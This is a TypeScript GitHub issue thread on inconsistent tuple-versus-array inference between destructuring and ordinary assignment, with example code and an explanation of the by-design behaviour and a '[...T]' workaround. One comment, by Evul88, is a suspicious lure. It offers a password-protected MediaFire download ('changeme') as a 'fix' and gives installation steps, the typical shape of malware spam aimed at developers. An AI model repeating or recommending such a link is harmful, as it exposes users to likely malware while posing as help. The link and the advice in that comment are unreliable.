### ISSUE TITLE
Inconsistent function argument type inference based on result assignment way

### ISSUE THREAD

**Issue by AjiTae** [microsoft/TypeScript#59781]
### 🔎 Search Terms

assignment, inference

### 🕗 Version & Regression Information

- This is the behavior in every version I tried, and I reviewed the FAQ for entries about destructuring assignment

### ⏯ Playground Link

https://www.typescriptlang.org/play/?ts=5.5.4#code/CYUwxgNghgTiAEAzArgOzAFwJYHtVKxgGcMAKAIwC54BGASmppoG4AoUSWBFdbPeIuDzBSUagCYG8ceLbtw0OEjSZc+EAA9wyDCAA8AFXibdqYEXhwowPBACe8NAGtUOAO6oA2gF0AfKR5VPCJqAwAaeGAoDDF4AEEYAHNkAFsQVAwiQ18pACUQDGQYVCyDXzkwYIx4T0RCEnyiZAgMCMFKs0bmjG94AF5jLTAdEFJa+taBITNvCM8aCPFvOmZ4AHo1+BwnVg6SSxAmlosBzW1dMbriSfbhWZqF6WXVjeMYGFC7AAcEAHJUVLkEAwX7wLAWVzVKBEIhYRKoKDkCAIDA4eAYb5-NCgOqoEDAX6sVgYn7wfKFYqlQamcwHay2BzOVweHy+frwADerHgNQA0mD8E4QHYcIh4AZvKFPLzeiZ0rTSAA6ZWwRIheBQVB2Hx0fpsrCoRDAsnwAD8JuoeIAbsC2ABfNgkhAJZJpDJUuVmCxWGyoeyOVAudxePzsrk86UC+BCkViiVSmXU+UWURJagGo0wMm6vpspnBs0W+DW22sB1AA

### 💻 Code

```ts
declare function first(b: 1): 11;
declare function second(a: 2): 22;

declare function execute<T extends readonly unknown[]>(functions: T, data: Arguments<T>): Returns<T>;

const [a, b] = execute([first, second], [1, 2]); // ok

const result = execute([first, second], [1, 2]); // err: Type 'number' is not assignable to type 'undefined'

type Returns<T extends readonly unknown[]> = {
  [K in keyof T]: T[K] extends (...args: any[]) => infer R ? R : never;
};
type Arguments<T extends readonly unknown[]> = {
  [K in keyof T]: T[K] extends (arg: infer R) => unknown ? R : never;
};
```

### 🙁 Actual behavior

Type inference works differently with destructuring assignment compared to regular assignment.

### 🙂 Expected behavior

Type inference shouldn't be affected by assignment way.

### Additional information about the issue

I know the types for execute function are not right, but its irrelevant.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Andarist** [comment]
TS has to decide how to treat your array literal. It doesn't know if its type should be a tuple type or an array type so it uses contextual information to decide this. The binding pattern is such information here and thanks to it it infers/assigns a tuple type to your first argument. The other example has no such information so it defaults to an array type.

You can fix this by hinting TS that you want tuples here like this:
```ts
declare function execute<T extends readonly unknown[]>(functions: [...T], data: Arguments<T>): Returns<T>;
```

There are also other ways to hint this but I find this one to be the most idiomatic one.

**Comment by AjiTae** [comment]
But should it really behave this way? It's incredibly confusing on a deeper, intuitive js level.:)

**Comment by Andarist** [comment]
It’s by design: https://www.typescriptlang.org/docs/handbook/release-notes/typescript-4-8.html#improved-inference-from-binding-patterns
